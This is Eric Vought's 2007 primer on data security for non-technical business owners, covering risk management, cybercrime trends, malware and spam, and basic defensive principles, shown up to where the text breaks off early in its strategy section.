Data Security For The Business Owner

Data Security For the Business Owner
How and Why for non-IT Professionals
Eric Vought <evought@pobox.com>

$Id: BusinessDataSecurity.dbxml,v 1.67 2007/05/19 00:06:11 evought Exp $
Copyright © 2007 Eric Vought
Legal Notice
Some of the designations used by manufacturers and sellers to distinguish their products are
claimed as trademarks. Where those designations appear in this text, and I was aware of the
trademark claim, the designation is appropriately marked on first appearance. Unless otherwise
noted, references to specific tools and applications in this article are presented only as examples of
what is available and not as endorsements. The reader is encouraged to read reviews and research
additional alternatives for his or her self.
I am not a lawyer and nothing in this document is to be construed as offering qualified legal
advice.
All Rights Reserved. This document may not be reproduced in whole or in part, in any form
(beyond that copying permitted by Sections 107 and 108 of the U.S. Copyright Law), without
written permission of the author. Copyright and permission of accompanying graphics and
stylesheets as noted in those files.
Abstract
This document is a data security primer for non-technical business owners, including explanations
of risk management, basic security concepts, and development of a sound security strategy.
Table of Contents
Preface ............................................................................................................................. 2
Goals ........................................................................................................................ 2
Audience ................................................................................................................... 3
Approach .................................................................................................................. 3
"Real World" Risks ............................................................................................................ 3
Building Safety .......................................................................................................... 3
Keeping People Out .................................................................................................... 4
Screening and Trust .................................................................................................... 4
Insurance Policies Mitigate Loss ................................................................................... 5
Data Security Is Also Risk Based .................................................................................. 5
Cybercrime and the State of the Internet ................................................................................. 6
The Internet Is Not Magic ............................................................................................ 6
The Goals of Internet Criminals .................................................................................... 6
Common Cybercrime .................................................................................................. 7
Things Are Not Hopeless ........................................................................................... 10
First Principles ................................................................................................................. 11
Secure the Perimiter .................................................................................................. 11
Guard Your Secrets ................................................................................................... 12
Create a Defense In Depth ......................................................................................... 12
Security By Obscurity Is Not Effective ......................................................................... 13
1
Business Data Security
Exploits and Vulnerabilities ........................................................................................ 13

Keep Your Eyes Open ............................................................................................... 14
Building a Data Security Strategy ........................................................................................ 14
First Steps ............................................................................................................... 14
Your IT Professionals ................................................................................................ 16
Document Retention and Protection ............................................................................. 18
Documentation, Policies, Audits— How Much, How Often .............................................. 18
An Incident Response Plan ......................................................................................... 22
Making IT and Security Purchases ............................................................................... 27
Your Network Layout ........................................................................................................ 32
The Network Perimiter .............................................................................................. 36
Employee PCs - The IT Battleground ........................................................................... 39
Network Services - Sharing and Editing Files ................................................................ 46
Internet Services and Communication ........................................................................... 50
Conclusions ..................................................................................................................... 50
Frustrations .............................................................................................................. 50
Glossary .......................................................................................................................... 51
Bibliography .................................................................................................................... 63
Preface
Goals
Data security, the protection of business information and associated computer networks, is a highly
technical field which is often associated with black magic by non-technical professionals. This situation
is not helped by a communications gap between IT professionals and business owners. Business owners
are not trained to understand the technical concepts and computer professionals cannot explain risks in
concrete business terms.
Uninformed business owners cannot avoid dangers and capitalize on opportunities in a rapidly changing
technical landscape. Frequently, critical issues are ignored and money is spent on ineffective solutions.
This document:
• explains security in terms of risk-management,
• reports on the current state of the Internet,
• describes fundamental security concepts in concrete, non-technical terms,
• develops basic data security strategies from first principles,
• presents example business cases where security versus opportunity trade-offs are made,
• and concludes by encouraging a "security mindset" where technology concerns are incorporated into
day-to-day business decisions.
This document will not turn the reader into an IT professional, much less a security professional. What it
can do, however, is better equip you to evaluate how data security affects your business and communicate
with technical professionals and vendors you hire to secure your data. It will also, hopefully, help you to
recognize the snake-oil salesmen who offer ineffective solutions to problems you may not even have.
Some parts of this document, those describing current electronic threats to your business, may seem
alarmist. These reports should alarm you: the current state of Internet security is very poor and some
authorities would say desperate. Most people are unaware of the ways in which systems are routinely
compromised. Vendors have a vested interest in keeping these facts quiet or no one would use their
products or services. Fortunately, however, prudence and care can elimate the most common threats and
2
make trouble even for sophisticated attackers. The biggest threat on the Internet is ignorance and the fact
that most computer users do not take even basic precautions. Safely navigating large cities requires street-
sense and awareness; the Internet is no different. As our world changes, businesses that become street-
smart will have a competitive advantage over those that do not.
Although I provide links to examples of products or technologies, I stear clear of providing steps to
accomplish tasks, use products, or secure particular types of systems (such as tightening down a Windows
XP™ computer or using encryption in Microsft Outlook™). Technology changes rapidly and my goal
here is to teach concepts that are independent of particular products. Specific technical solutions are best
handled by IT staff for larger businesses or technology specific howtos for SOHO professionals.
Audience
This article is targetted at small to medium-sized business owners. Much material applies to Small Office/
Home Office (SOHO) users, particularly background information, basic security strategies, and much of
the discussion on desktop and communications security. SOHO readers who are not connected with or do
not work within a larger organization will find that discussions of policy, management, and organization,
as well as network architecture and services will not directly apply to them and will likely skip or skim
those sections. Owners or managers of larger businesses will find that discussions of security plans here
are necessarily simplified. Medium to large organizations have complex and varied networks with legacy
technologies and layers of existing policy which cannot be treated in one document. In these cases, the
glossary and bibliography will help you to find other sources of information. Given the concepts presented
here and the help of competent specialists, it is hoped that a manager can learn what they need to know
about their own system to manage it effectively.
Approach
The information presented here is extensive— do not try to absorb it all at once and do not expect to change
your business overnight. Take it in steps. I recommend reading through once at a high level to absorb
the contents and skim the detail. Then start through again. I have worked to provide extensive references,
links, and a glossary. Focus on the parts that are most important to your business, explore the references
and talk to your IT people. If you find that your IT staff or consultants will not work with you, get new
ones. Try to learn and improve something each week. The end goal is to turn the Internet from an unknown
source of risk to something which can be understood and capitalized on.
"Real World" Risks

Tip
The goal of security is not to combat risk for its own sake, but to maximize business opportunity.
Outside of cyberspace, your business must balance risks in order to remain profitable. When you see
business opportunities, you identify risks, determine how likely they are, how much damage they may
cause, what may be done to lower or avoid the risks, and, ultimately, whether the opportunities are
worthwhile. Sometimes outside experts, such as lawyers, market experts, or insurance agents, are consulted
to assess the risks or suggest ways to protect the business. Sometimes the business must change the way it
operates to avoid liability or comply with regulations. In any case, the overriding goal is never to combat
risk for its own sake but rather to maximize opportunity and create a successful business.
Building Safety
Buildings are required to have basic safety features such as lighted exit signs. In some locations it is
forbidden to use a corded vacuum cleaner during business hours in an area with pedestrian traffic. In other
3
locations, this is left to the discretion of the business ower. The business owner must balance the likelihood
of a pedestrian being injured by tripping against the need to run the vacuum. Given the high damage awards
for personal injury lawsuits and the low cost of push-powered carpet sweepers, this is probably an easy
choice. The cost of installing a backup lighting system in a small office occupied only during the day is
not so easily justified.
Tip
Good risk management focuses on effective solutions to tangible problems.
I was recently startled by the presence of a sprinkler system in a hotel common room. The room was made
entirely of brick and concrete and its only contents were a large swimming pool. The cost of safety systems
must be balanced by risk analysis. The sprinklers were an ineffective solution to a non-existant problem.
Keeping People Out

Your business most likely has to deal with a variety of physical security issues. You must lock your
business to protect its own property, such as its equipment, product inventories, any cash or deposits,
financial instruments such as checkbooks and stock certificates, records, etc, from theft or vandalism. You
may also have to protect property which belongs to third parties, such as rented furniture or equipment
or items held on consignment. In all likelihood the entire building is rented and your business might be
liable for any damage.
In one of the great injustices of our legal system, a business is sometimes held liable when a trespasser
injures themselves on business property. It is possible that a business property may be used by a third
party for illegal acts such as storing contraband in an otherwise legitimate warehouse. I have seen many
instances of teenagers consuming drugs and alcohol on unsecured construction sites. A business may have
to spend significant effort to install locks, fences, and cameras to keep people out. Sometimes the mere
presence of a lock and a "No Tresspassing" sign is enough to reduce the potential liability.
Tip
Sometimes the greatest risk of an incident of any kind is loss of customer or investor confidence,
even when direct financial damage is minimal [Lemos-2007a].
Like building safety, the expense of physical security must be balanced by the risks and potential cost of a
break-in. It makes no sense to spend $10,000 on a safe to contain $2,000 in valuables. On the other hand,
all potential costs must be weighed. Even if the monetary value of stolen equipment is low or it is well
insured, how much business will be lost before it can be replaced? Will a break-in and business delay raise
insurance rates and lower customer confidence?
Screening and Trust

Parts of your business are more sensitive than others. You would not ask the same people to negotiate
with clients or give you legal advice that you hire to answer the phones. This is both a question of trust
and of competence. Your legal counsel is trained and licensed to practice law. You probably went through
some screening or interview process to select a lawyer that you were comfortable with, even if that was
only flipping through the yellow pages and talking to some of them on the phone. As you develop your
business relationship, you may trust them to perform tasks with less intervention.
Only certain employees have access to your financial information, including your bank balance, the ability
to write checks, business credit accounts and so forth. These employees have a background, such as a
4
CPA license or business course, which makes them appropriate choices for their assigned tasks. If you
are prudent, you check on their work regularly, going over accounts and reports, checking invoices and
balances and, generally making sure that you are not being taken advantage of. When employees leave, you
must ensure that important records and items stay behind and that they no longer have access to accounts
they worked with during their employment.
Tip
You should be aware of who has access to your electronic information, what their disclosure
policies are, and how it might affect your business.
If you deal with sensitive information, you may have to perform background checks on applicants. This
may include drug screening, records checks, and checking references. Employees who have gone through
ths screening will have access to parts of your business that others do not.
Insurance Policies Mitigate Loss

Tip
Are your information assets insured? What happens if your records are destroyed?
Your business most likely has a number of insurance policies, including general liability, equipment
protection, fire, key man and so forth. While building safety and physical security attempt to prevent loss
from occuring, insurance reduces loss after the fact. The desired balance between prevention and cure
is often unclear, but the common element is that both are based on estimate of risk and probable loss.
Insurance premiums and policy coverages are based on statistical estimates of the likelihood of loss and the
amount of that loss. Insurance companies wager that the amount that they will gain from your premiums
will earn more than they will pay you in the event of a claim. In return, you gain the piece of mind in
knowing that a disaster will not financially ruin your business.
Data Security Is Also Risk Based

Data security is no different from any other business risk assessment. What do you have to lose? What
will it cost to protect your systems? Where is the best return on investment?
Tip
The precautions a business has taken will often be judged with hindsight, possibly by a jury, after
an incident has occured.
When data confidentiality agreements or federal regulations like HIPAA require you to take "reasonable
precautions" they are telling you that you will be judged after the fact, by a jury. When an incident actually
occurs, your policies will be examined under a microsope through the lense of hindsight. Your job, then,
is to balance the probability and cost of a lawsuit against the cost of your security.
You can never be certain your systems are secure, just like you can never be certain your business will not
suffer a fire or an on-the-job injury. At some point, you decide what is reasonable, roll the dice, and take
your chances. As with any other business risk, you need to find a balance between preventing loss and
mitigating loss after the fact. Security systems such as passwords and firewalls prevent loss. Some types
of insurance mitigate digital losses: some policies provide "data loss" protection, your liability insurance
might provide protection against breach-of-security suits, etc. Backup and data recovery systems also help
to mitigate loss after the fact.
5
Cybercrime and the State of the Internet

The Internet Is Not Magic
Tip
The Internet does not change the laws of economics or fundamental business practices.
Although the Internet is often touted as "changing all the rules," a more critical look shows that this
is seldom the case. Businesses, whether they use the Internet or not, must still market their services to
customers, must still make reasonable margins, deliver real or perceived value, and compete successfully
against other businesses trying to do the same thing. Similarly, crime on the Internet is generally an
extension of real world crime or is readily analogous to real world crime.
It was the erroneous belief that the Internet was fundamentally different, that it changed the rules of
business, which lead to the dot-com bust. Very shaky ventures attracted enormous investments based on
the idea that the magic of the Internet would make them profitable. This did not happen.
What the Internet does do is change the parameters of time and space. OK, back up; what does that mean?
• The Internet is globally connected. Many more people, potential customers and potential criminals,
now have access to your business. Similarly, global competitors now have access to your traditional
customer base.
• The Internet is always open for business. Customers are not accustomed to having online businesses
close shop at dark and roll down an iron grate. This means that your Internet facing applications are
accessible and open to attack at all hours.
• Suddenly everything is smaller: a one hundred page proposal with exibits can be sent to a client in
seconds and will fit on a single thumb-sized USB drive. On the other hand, someone can walk out with
your entire customer contact list the same way.
• Things happen faster on the Internet. You can sell CDs to ten customers on the Internet faster than you
can process one customer at your cash register. You can submit insurance claim forms in seconds instead
of days. You can get responses from regulatory agencies by email in the course of a single business day
instead of a week by mail. On the other hand, several thousand people can attempt to break into your
online store in the course of a single night.
• Because anyone can access anything from anywhere, it can be very difficult to determine who actually
did so at a specific time. Tracking criminals and sorting legitimate purchases from fraudulant ones can
be difficult, especially when the criminals are clever.
The Goals of Internet Criminals

The motives of criminals on the Internet are no different from any other criminals:
• Simple theft. Make a fraudelent purchase and get away with it.
• Steal sensitive data to make theft easier. Real thieves steal credit cards, raid mail boxes, and print fake
IDs. Internet thieves steal or forge the electronic equivalents.
• Espionage: government, corporate, or personal. Governments spy on each other, businesses want to get
hold of each others' client lists, research, and proposals, people want to spy on their rivals. Internet
espionage is easier than going through dumpsters, but has the same goals.
6
• Revenge. Disgruntled employees may keep a grudge against a business, so can rival businesses, or ex-
spouses. Any of those might have or might be able to obtain the information necessary to do damage.
• Embezzlement, insider trading, or other stock fraud.
• Thrill. Just like spray-painting the side of a bridge, someone may damage your website just for pleasure.
There is an underground of young hackers who think it is cool to break into companies and brag about it.
• Cover their tracks. Just like hiding contraband in someone else's warehouse, a criminal may use your
legitimate business as a base of operations for some other illegal scheme. The criminal could be one of
your own employees downloading illegal files or attacking another system.
Common Cybercrime
So, how common is crime on the Internet and what form does it take?
Crime Statistics
According to the 2006 FBI Internet Crime Report [FbiIc3-2006] the FBI Internet Crime Complaint Center
processed 200,481 Internet-related crime complaints, a number which is down somewhat from 2005 but
more than double 2003 figures. Complaints supported 86,279 criminal investigations at the federal, state,
or local level. The complaints were varied, including auction fraud, non-delivery of goods, credit card
fraud, computer intrusions, SPAM, and child pornography. Almost all involved financial loss, with a total
loss of $198.4 million (up slightly from last year).
The FBI and Computer Security Institute perform a yearly survey of computer security professionals in US
organizations (companies, government agencies, medical institutions, etc.). The 2006 Computer Crime and
Security Survey [GordonEtAl-2006] polled 616 such professionals on the number and type of incidents
experienced, security budgets, protections in place, and so forth for 2005. Among its findings is that the
top four threats, viruses, unauthorized computer use, theft of equipment, and theft of intellectual property
(in order) account for 74% of losses. Fifty-two percent of respondants reported unauthorized use of their
systems in the twelve month period and 9% reported more than 10 such incidents. Total losses from the
313 respondents willing to provide figures were estimated at over $52 million. A disturbing trend is the
number of respondents who claimed substantial loss from insiders.
Reported financial damages and number of successful attacks have noticeably decreased against previous
years, but the survey is skewed toward companies with security policies in place (they have dedicated
security personnel and have been in contact with CSI) who have presumably been improving their defenses.
This offsets bad news in other quarters and demonstrates that companies can make progress given time.
Interestingly, 22% of those surveyed were in organizations with from 1-99 employees, so small to medium
businesses were well covered. The survey notes that per employee expenditures on security are much
higher in smaller organizations (by total revenue), something we will talk about with respect to regulation
compliance later on.
Identity Theft
Identity theft and credit card fraud are currently handled and reported by a variety of agencies and reported
statistics are not normally separated according to online and offline categories. What is clear, however,
is that theft or misuse of credit card numbers and fraudulent applications for credit cards is rapidly rising
and wholesale theft of private data fuels the crisis.
Perhaps the largest such data theft involved TJX, the owner of TJ Max™ and other stores, and the loss
of 45.6 million credit card numbers [Vijayan-2007a]. Several break-ins occured starting in July 2005 but
were not noticed for over a year. It has become common to see vendors expose tens of thousands of private
7
customer records including names, addresses, social security numbers, and financial information due to
security breaches. This creates vulnerabilites for online merchants who may be liable to charge-backs and
fees from fraudulently made purchases. It also exposes business cardholders whose accounts may have
high limits and high purchase volumes where fraudulent use may escape immediate attention. Vendors
who lose data in this manner may be the target of lawsuits and may lose their merchant status.
Tip
Governments do not hold a monopoly on espionage.
A related topic is of stalking, spying, and espionage. When people think of spies, they immediately think
of secret government agents, but the truth is that businesses and private individuals spy on each other all
of the time. Getting hold of a competitor's proposals, trade secrets, client contacts, or price lists can yield
a tremendous market advantage and many businesses are not above bending or breaking the law in order
to do so. In my time as a defense industry contractor, the threat of competitors stealing proprietary data
was only slightly less than that of foreign governments.
Private individuals may attempt to steal or leak proprietary data in order to affect or guess changes in
stock prices. Insider trading is a constant subject of SEC investigations and although it is not new to the
electronic world, data networks certainly open up new opportunities for exploitation.
Pretexting, made famous by the recent Hewlett Packard Board of Directors scandal [Krazit-2006], is the
practice of impersonating a person or entity in order to obtain more information about them. The actual
impersonation is often done over the phone, but the initial investigation is generally performed using the
Internet. Enough information can be gathered on the Internet to successfully impersonate the target over
the phone, to say, the phone company, or a bank, and then copies of personal records can be obtained.
Internet investigation companies sell services using pretexting to individuals wishing to investigate a
rival or competitor. This information can then be used for a variety of illegal purposes. In many areas,
law enforcement is hard pressed to identify specific laws that pretexters violate, although lawmakers
are working to draft specific bills. It is not clear whether companies may be held liable for giving out
information to pretexters or for using insufficient verification of customer identity.
Silent Crimes
The FBI report only counts reported Internet crime. Many businesses and computer users may suffer from
security compromises and not be aware of the damage. In the past, viruses and malware would damage or
destroy target systems leaving obvious signs of their presence. Today, a virus or intruder is just as likely
to quietly copy data and leave a back door open so they can return at will. Attackers install key loggers
which track the computer's use and look for sensitive information like passwords and account numbers.
Tip
An attacker may visit your system repeatedly and use your computer for illegal acts without
leaving any sign of their presence.
Many PCs are turned into so-called zombies which are remotely controlled to perform a number of
illegal tasks, including sending commercial SPAM, engaging in bank fraud (phishing schemes), Denial-
of-Service (DoS) attacks against security companies, government agencies, and public infrastructure, and
attempting to break into new systems. A company called CipherTrust1 tracks approximately 250,000 new
zombies each day. Security company Symantec reports that more than six million computers are now under
remote control [Bbc-2007a], although some experts put the number much higher, perhaps as much as one
quarter of Internet connected systems [Weber-2007].
1
http://www.ciphertrust.com/
8
Corporate networks are not immune to the zombie threat. Even fortune 500 companies have been
embarrased by SPAM-spewing zombies on their networks, sometimes brought in by contractor-owned
laptops [Krebs-2007].
A worrying development is the creation of web sites by crime syndicates selling sophisticated toolsets,
including technical support, and subscriptions for upgrades. These toolkits allow the purchaser to set up
malware on their own or someone else's website to infect visitors; they then get paid for information
collected from the victims [Vijayan-2007b]. Because of this, malware silently delivered by websites is
rising sharply and is increasingly being delivered by legitimate business or government web sites which
have been hacked themselves [Bbc-2007b].
SPAM
SPAM, or unsolicited bulk messages, are now a significant chunk of all Internet traffic. A compilation
of statistics from 2006 by Don Evett puts SPAM at 40% of all emails, or 12.4 billion messages per day
[Evett-2007]. This figure is rising exponentially and is beginning to place significant stress on the capacity
of Internet infrastructure. SPAM today is mostly sent from PCs that have become zombies. Most SPAM
advertises pornography, illegal business scams, stock fraud, fake products, phishing schemes, or other
items of a questionable nature. Nevertheless, many computer users respond to such emails and even attempt
to make purchases, visit sites, or participate in illegal ventures.
Tip
SPAM, continues to be sent because it works: enough users participate in the schemes it advertises
to make sending the SPAM worthwhile.
SPAM causes a number of problems to a business, not the least of which is simply the time lost to sorting
through junk. Personally, I receive over ten SPAM messages for each legitimate email and use a variety
of filters to prevent it from reaching my mailbox. SPAM messages which may contain bulky images slow
down networks, increase time spent downloading messages, and increase network mail storage. Aside
from the mere nuisance, however, SPAM is actively dangerous: it can deliver viruses, tempt employees to
open dangerous attachments, expose financial information, visit sites which will attack their computer, or
participate in illegal activities. Another business aspect of SPAM is the marketting side; extreme care must
be taken when using email as a marketting tool to avoid antagonizing customers already sick of SPAM
or landing the company mail server on a SPAM blacklist.(emv 20070424) I'd like to find a reference here
about an accidently RBL'ed company.
Malware
Caution
Beware virus warnings! It is not uncommon to receive emails reporting a new virus threat that is
not detected by virus scanners which request that you take action, such as deleting files on your
hard drive or installing attached patches. In many cases, following these instructions will damage
your system or compromise your security. I have received many calls from clients, relatives, or
friends asking me what to do afterwards, and usually “Reinstall your system.” is the only answer.
Recently, a large virus outbreak was fueled by just such an email [Keizer-2007]. Always check
with a trusted security professional or with the website of your security vendor before acting on
any security warning and do not forward the email to others. Never follow links provided in the
email to security sites; always type them in yourself or use your own bookmarks.
Malware: spyware, viruses, trojan horses, and so forth, is a common and growing problem. Part of this
stems from the desire of many computer users to try dozens of new tools and games on their (or their
employer's) computer. Part of it stems from deep-seated flaws in the Windows operating system which
makes it easy for malware hiding in these programs to take control of the computer. Part stems from
9
unscrupulous vendors who include malware in their products in attempts to collect marketting data, prevent
users from running competing products, display advertisements to users or direct them to advertisements
on the web.
Sometimes these products are not explicitly designed to cause harm, but they contain bugs which damage
infected computers or open up security vulnerabilities which are exploited by other attackers. Sony, for
instance, included a root-kit on a large number of music CDs which silently installed itself on a PC used to
play the music. The root-kit was intended to prevent the user from copying the songs and report information
about the user's listening habits to Sony but opened up security holes which others could use to break into
affected computers [Kantor-2005]. The fix released by Sony opened up more security holes and resulted
in an outbreak of viruses tailored to PCs that had been used to play Sony music. Equally disturbing is the
fact that security companies, who considered Sony a “legitimate” vendor, were slow to react and slower
still to add the Sony root-kit to their malware detectors [Schneier-2005].
Not-me Syndrome
Many businesses believe that they are not at risk because they do not have anything in their network to
interest an attacker. This is a dangerous myth.
Tip
Your business may not be of direct value to an attacker, but it may be a stepping stone to other
illegal acts. Collateral damage is a problem.
I was once called in to a real estate appraisals business because their mail server suddenly went down.
They had recently lost their system administrator and had not yet obtained a new one. Upon investigation,
I determined that their server had not merely failed but had been deliberately destroyed. Suspicion
immediately fell on the previous system administrator, but I was eventually contacted by CERT2, the
Computer Emergency Response Team, with information that the mail server had been used to attack a
government system. The attacker had broken into this business' server, used it to attack another site, then
destroyed the server and its logs in order to cover their tracks.
The attacker had entered through a vulnerability in out of date mail server software. Due to the destruction
of the logs, we were never able to determine where the attacker came from. The attack cost the
business downtime, IT service costs, and expensive security upgrades to prevent a reccurence. Perhaps as
importantly, the breach allowed someone to successfully attack a government system and get away with it.
In recent years, I was responsible for the maintenance of a number of server systems running web sites,
email, and other services for small businesses. The servers would record thousands of attempted attacks
per day. Most of the attacks attempted to exploit weaknesses in software we were not running, and I used
tools to filter the logs down to the dozen or so attacks per day which I would examine and file reports on.
A sizable portion of these attacks were from east asian countries and I would seldom receive responses
to my reports. The responses I received from US and european network administrators, large and small
companies, generally stated that their security had been breached, often by operators from East Asia,
and their systems had then been used to attack dozens of others, including those under my care. The US
Department of Defense has reported incessent atempts by attackers from certain asian countries to breach
military security, possibly with foreign government support, and unwary businesses may often be used as
springboards in those efforts. (emv 20070424) Can probably find a reference here on the DoD issues.
Things Are Not Hopeless

This all may seem very depressing, and indeed it should. A survey of "real world" criminal activity, such
as the increase of shoplifting or convenience store robberies, may seem depressing as well, however, and
2
http://www.cert.org/
10
businesses did survive and flourish before the advent of computers. Many businesses protect themselves
against traditional criminal activities as a matter of standard practice; banks, for instance, have done
business through small slots for decades and indeed a chinese payroll clerk invented this defense thousands
of years ago. Businesses can and will develop standard defenses against Internet crime and those which
do will enjoy a competitive advantage against those which fail to adjust.
Tip
You don't need to outrun the bear, you just need to outrun your friend.
It is not necessary and indeed not possible to protect your business from all attackers. It is only necessary
to make your business a difficult enough target that criminals will look for easier marks. The success of
The Club™3, an auto theft deterrent which locks a car steering wheel, is not that it prevents theft. Indeed,
there are several known techniques to bypass them. Many thieves are lazy by nature and do not want to
expose themselves to detection longer than necessary. If two cars are sitting next to each other and only
one of them is protected, the unprotected car will be stolen every time.
Of necessity this leads to an arms race and security is not a matter which can be solved once and forgotten.
By applying basic principles, however, and incorporating them into business planning, your enterprise will
automatically adjust to new and developing threats.
First Principles
In this section, we will discuss basic security principles. These principles apply to many situations outside
of data security, including physical security, warfare, biological defense against infection and so forth. Data
security is complex and requires significant training, but it is not magic. By understanding basic security
principles you can better communicate with professionals you hire to help you, better evaluate the claims
of vendors, balance business risks and opportunities, and use safer practices in your daily work. We will
approach these concepts with real-world, physical examples, and then demonstrate computer equivalents
in later sections.
Secure the Perimiter

You probably have valuable items in your house. At the very least, you will have electronic equipment like
an entertainment center, important documents, perhaps expensive jewelry. These items would interest a
thief. When you go out, you probably lock your door. Locking the door secures the perimiter of your house
and makes it difficult for the thief to enter. Even if a thief gets past the lock, it has increased the time they
spend getting into your home, increased their likelihood of getting caught, and raised the penalties they
would receive (Breaking and Entering). In some locales, the mere presence of a lock or security device
doubles applicable fines and sentences for theft or vandalism.
Tip
Perimiter security is only as good as its weakest point.
The lock on the door may not be effective if other parts of the perimiter, the outside of your house, are not
secure. If your garage door is unlocked, you have unlocked ground floor windows, perhaps a basement
door, etc., the expensive deadbolt on your front door is useless.
The Manhattan Project physicist Richard Feynman worked at Los Alamos during World War II. The Los
Alamos National Laboratory was a Top Secret facility with access controlled by armed guards. One day,
Feynman discovered that there was a hole in the outside fence. People were using the hole to get back and
3
http://www.amazon.com/Original-Club-1000-Anti-Theft-Device/dp/B0000CBILL
11
forth to town without going through the security checkpoint. Feynman reported the hole but was ignored.
He then walked out of the hole and back in through the checkpoint. He repeated this several times before
the guard grew suspicious and noticed that Feynman kept going in but never came out. Finally, the hole
was fixed [FeynmanEtAl-1985].
It is tempting to ignore holes in your perimiter security, but by the time someone acts responsibly and
reports them to you, you can bet that other people of less character have noticed as well.
Guard Your Secrets

If you lock your door and leave the key on the top of the frame or under the mat, your lock will not be
effective. Likewise, if you give copies of your key out to unreliable or unscrupulous individuals or do not
change the lock when you move in, you can no longer limit access to your home.
Tip
Locks, no matter how sophisticated, are only as effective as the secrets which protect them.
Your key is a secret which is supposed to be known only to you and tells the lock that you are authorized
to enter. The same principle applies to combination locks. If you never change the combination from the
manufacturer's setting or use a number (such as birth date or anniversary) that someone else can readily
look up or guess, the lock will not protect your valuables.
Create a Defense In Depth

If the armed guard had been the only security feature at Los Alamos, the hole in the outer fence would
have compromised the entire facility and the entire Manhattan Project. Of course, the fence was not the
only obstacle a potential spy had to deal with. First of all, the existence of the Manhattan Project and the
purpose of the laboratory was a secret. The buildings and important rooms had locks. The scientists were
sworn to secrecy. Documents were locked in safes. In a small group of people, an intruder, particularly
one without appropriate ID, would be quickly identified. All of these features worked together to protect
the project. This is a defense in depth.
Similarly, at your home you may have a gated fence. You might have a dog or an alarm system. Perhaps
there is a neighborhood watch. Your most valuable possessions might be in a wall safe and perhaps photos,
serial numbers, or appraisals are stored in a bank safety deposit box so that you can provide them to law
enforcement or your insurance agent.
The important thing is that multiple levels of security act together to deter or slow down an intruder. If
one defense fails, other defenses must still be dealt with. Sometimes layers of defense can stop an intruder
and sometimes they only limit damage. Perhaps an intruder who jimmies your lock can steal your DVD
player but not your jewelry.
Tip
Often, several simple or inexpensive layers of security are much more effective than one
complicated or expensive layer.
A simple lock and an inexpensive alarm may be more effective than an expensive lock and no alarm.
The alarm will also protect you when the intruder breaks a window. When planning, beware silver bullet
solutions which claim to solve all of your problems in one go. It only takes one simple mistake elsewhere to
bypass your expensive protection. Simpler solutions have the added benefit of being easier to understand,
easier to verify, and sometimes harder to penetrate. Blocking your door with a heavy iron bar may be crude
but it is simple, cheap, and effective.
12
Tip
Always put together an overall security plan first. You can go back later and upgrade individual
pieces.
Get the most out of security by making it do double duty. Putting valuables in a safe and storing insurance
documents with your bank will help protect you from fire as well as theft. Getting to know your neighbors
can keep you informed on all kinds of issues. You will find similar ways that data security can be used
to achieve other business goals.
Security By Obscurity Is Not Effective

When you go to a hardware store and buy a deadbolt for your front door, you will probably find that it
meets certain industry standards, such as ANSI/BHMA A156.5-2001 and it is probably UL listed. It is
based on a standard design which has been thoroughly tested. Any thief can look up detailed information,
but in the end, they still have to exert a minimum amount of force or effort to overcome the lock.
When writing a letter, the writer can read the same sentence many times without realizing it is wrong;
they already know how they intend it to read. Someone else reading the letter will notice the mistake right
away. Similarly, security planners will routinely overlook critical details which are obvious to someone
else. Good security is built on simple, standard, well tested components that many eyes have looked at and
many people, designers, security experts, and thieves, have tried to break.
Security by obscurity is a defense that depends on an attacker not knowing how it works to be effective.
A one-time battle plan dependent on surprise may fool the enemy, but a security plan must fool the enemy
every day, time and time again. Any flaw, no matter how small, no matter how secret, will be discovered.
Tip
In general, more eyes means tighter security.
A manufacturer claimed that their fingerprint scanning door lock based on "proprietary technology"
had not been broken in months of testing. A team from the TV show MythBusters found three ways
to bypass the lock in just a couple of days. Perhaps the DeathStar could have been saved by better
operational security, or maybe they should have let the MythBusters folks review the blueprints before
building[MythBusters-2006].
Exploits and Vulnerabilities

Knowing the difference between exploits and vulnerabilities is important in assessing security and the
level of risk. A vulnerability is a potential hole in your security, such as a second-floor window which
swings outward. An exploit of that vulnerability might involve a ladder and a prybar.
It may be that there are multiple ways to exploit a particular vulnerability or that it is only a potential
problem with no known exploit. Often, detecting a vulnerability gives you time to fix it before an attacker
becomes aware of it and figures out how to use it to their advantage. A zero-day exploit is one where a
vulnerability and a publicly known exploit are discovered at the same time, usually because the bad guys
were the first to find it. The hole in the fence at Los Alamos is a good example of a zero-day exploit— the
hole was in common use before it was discovered by security and fixed.
A defense-in-depth can sometimes prevent certain exploits and lessen the risk of a vulnerability. With our
second-floor window example, controlled access to the property with a fence and a guard shack might
make it rather difficult to sneak in with a ladder or a prybar.
13
Keep Your Eyes Open

In security, paranoia is an asset. Noticing suspicious patterns and odd details is important to protecting
your business. You would probably be suspicious if someone you did not recognize was leafing through
files in your office or called you and asked for your credit card number. Maybe you would find it odd if an
employee you were paying minimum wage suddenly had a $500 watch or you ran into a client when one
of your salespeople was supposed to be meeting them for lunch. If you are prudent, you probably go over
accounts or budgets and expenses on a regular basis. Noticing odd behavor is not a basis for flying off
the handle— unusual things happen; certainly, however, questions might be asked. Once you are familiar
with data security, you will also be able to notice when things are out of place in the electronic world.
Tip
Careful records are critical to establishing patterns and reconstructing events when a problem is
discovered. Having safe copies of records prevents tampering and fraud.
I once had an employee who had repeatedly violated company policy. Notes of this and a disciplinary
warning were placed in the employee record. The employee, who was responsible for filing, quietly
removed the notes. They were not aware that management routinely copied employee records and stored
them in a safe.
Tip
Be assertive and ask questions.
When I worked at the Pentagon, we were trained to avoid a common attack. Most secure facilites have a
phone on the outside so a visitor can call to have an authorized person let them in. One technique is for an
intruder to walk up and pretend to be talking to someone inside the facility. When an authorized person
arrives, they say, "Oh, hang on, someone else just showed up." and follow the new arrival in. Authorized
personnel are uncomfortable about challenging the intruder.
Management and personnel need to be trained to be assertive and ask questions in all security situations
and any time something smells fishy. Often, a manager who has their credentials challenged will punish
the employee. This is counter-productive and will allow an attacker to bluster their way through defenses.
Instead, managers should expect to be challenged and discipline those who do not follow established
procedures.
Building a Data Security Strategy

In this section, we will begin to develop a top-down security strategy for your business, looking at what
needs to be protected, how to begin developing security policies, responding to incidents, and making
sound purchases. In later sections, we will explore how attackers attempt to breach your networks and
access your data, applying basic security principles to making their job harder.
First Steps
One of the first things you need to think about in the context of data security is what you want technology
to accomplish for your business. Is your website an essential part of your sales effort or are most of your
leads generated from referrals? What technology makes the biggest difference in your daily productivity?
What technologies actually detract? By asking questions like this, you start to get a basis for making risk
decisions— how far you are willing to stick your neck out to support certain IT strategies and how much
protection is worthwhile. If a piece of technology does not improve your ability to do business, why take
on expense and risk?
14
Another good starting point is figuring out where you are now in the security scheme of things. Doubtless
you have some interest in securing your business and are putting effort toward that end or you would not
